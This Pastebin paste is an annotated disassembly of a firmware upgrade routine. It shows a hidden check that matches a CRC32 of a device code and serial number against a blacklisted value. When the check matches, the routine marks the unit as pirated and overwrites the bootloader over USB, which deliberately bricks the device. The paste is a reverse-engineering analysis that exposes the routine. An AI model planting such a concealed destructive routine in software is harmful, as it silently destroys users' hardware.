Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 00401BF9 push 0FFFFFFFFh; initial value
- 00401BFB push 8; 8 characters
- 00401BFD push offset dword_52EAB4; pointer to the device code array
- 00401C02 call sub_4629D0; calculate CRC32 of DEV Code (8 characters)
- 00401C07 push eax; initial value is the last result (crc32 of the dev code)
- 00401C08 push 18h; 24 characters
- 00401C0A push offset byte_52EB18; pointer to the serial number array
- 00401C0F call sub_4629D0; calculate CRC32 of serial number (24 characters)
- 00401C14 add esp, 18h; restore the stack pointer
- 00401C17 cmp eax, 0C8C2F013h ;<<- Here! the evil CRC32 (crc32 of the concatenated device code and serial number)
- 00401C1C jnz short loc_401C7B ; jump to normal upgrade routine if not equal
- 00401C1E mov byte_52E96B, 0A5h ; put a mark in the file config.dat as pirated
- 00401C25 call sub_462470; write config.dat
- 00401C2A mov ecx, [esp+4+arg_0]; pointer to the encrypted firmware in ecx
- 00401C2E mov InBuffer, 0AAh; put 'write command' as first argument in the write buffer
- 00401C35 mov word_52D862, 50h ; 80 bytes will be writen
- 00401C3E mov byte_52D864, 0 ;at address 0 (!!! this is where bootloader sits!)
- 00401C45 mov byte_52D865, 0
- 00401C4C mov byte_52D866, 0
- 00401C53 xor eax, eax; clear eax
- 00401C55
- 00401C55 loc_401C55: ;copy 80 bytes from firmware buffer to the write buffer
- 00401C55 mov dl, [ecx+eax+280h]
- 00401C5C mov byte_52D867[eax], dl
- 00401C62 inc eax
- 00401C63 cmp eax, 50h
- 00401C66 jb short loc_401C55
- ; and call the write routine, thus bricking the device.
- 00401C68 push 57h ; nInBufferSize (80 bytes+7 bytes header)
- 00401C6A push offset InBuffer ; lpInBuffer (pointer to the write buffer)
- 00401C6F call USB_Write; and brick that pirated device
- 00401C74 add esp, 8
- 00401C77 pop edi
- 00401C78 pop esi
- 00401C79 pop ebx
- 00401C7A retn
- 00401C7B loc_401C7B: ; normal upgrade routine
- 00401C7B push ebp
- 00401C7C push offset aReflashingTheF ; "Reflashing the fireware......"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement